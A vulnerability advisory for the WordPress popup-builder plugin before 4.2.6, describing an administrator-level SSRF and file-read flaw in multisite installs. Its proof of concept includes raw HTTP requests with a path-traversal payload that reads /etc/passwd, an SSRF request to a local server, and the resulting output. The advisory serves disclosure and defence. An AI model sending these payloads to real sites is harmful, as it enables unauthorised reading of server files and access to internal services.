WordPress Plugin Vulnerabilities
popup-builder < 4.2.6 - Admin+ SSRF & File Read
Description
The plugin does not validate a parameter before making a request to it, which could allow users with the administrator role to perform SSRF attack in Multisite WordPress configurations.
Proof of Concept
1. Create a multi-site wordpress setup, i.e. using docker-containers, and setup a second "site" with a separate administrator (without super-admin/network-admin rights). 2. Install the popup-builder plugin and activate it for the network 3. Login as said new administrator to the separate site (here: "site2" at "/site2/"). 4. In the admin dashboard, navigate to Popup Builder -> Add New and add a new dummy Subscription 5. Navigate to All Subscribers -> Import. Choose the dummy subscription and enter any text in the File-Field. 6. Intercept the HTTP request issued by submitting the import form, which will include a valid nonce. 7. Change the parameter "importListURL" to "../../../../../../../../../../../../../../../../etc/passwd": POST /site2/wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 156 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: [cookie] Connection: close action=sgpb_import_subscribers&nonce=7ab37e2ddd&popupSubscriptionList=8&importListURL=../../../../../../../../../../../../../../../../etc/passwd&beforeSend= This will output the first line of /etc/passwd in the response: <div class="subFormItem__title"> root:x:0:0:root:/root:/bin/bash </div> 8. Alternatively, "importURL" can be set to any URL allowing for SSRF, i.e. "importListURL=http://localhost:1337" with a "python -m http.server 1337" serving a "hacked.txt": POST /site2/wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 130 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: [Cookies] Connection: close action=sgpb_import_subscribers&nonce=7ab37e2ddd&popupSubscriptionList=8&importListURL=http://localhost:1337/hacked.txt&beforeSend= Response: <div class="subFormItem__title"> Hacked </div> Output from python: root@6bd896f15815:/var/www/html# python3 -m http.server --directory /tmp 1337 Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ... 127.0.0.1 - - [21/Nov/2023 15:05:01] "GET /hacked.txt HTTP/1.1" 200 -
Affects Plugins
References
CVE
Miscellaneous
Original Researcher
Sebastian Neef
Submitter
Sebastian Neef
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-01-17 (about 3 months ago)
Added
2024-01-17 (about 3 months ago)
Last Updated
2024-01-17 (about 3 months ago)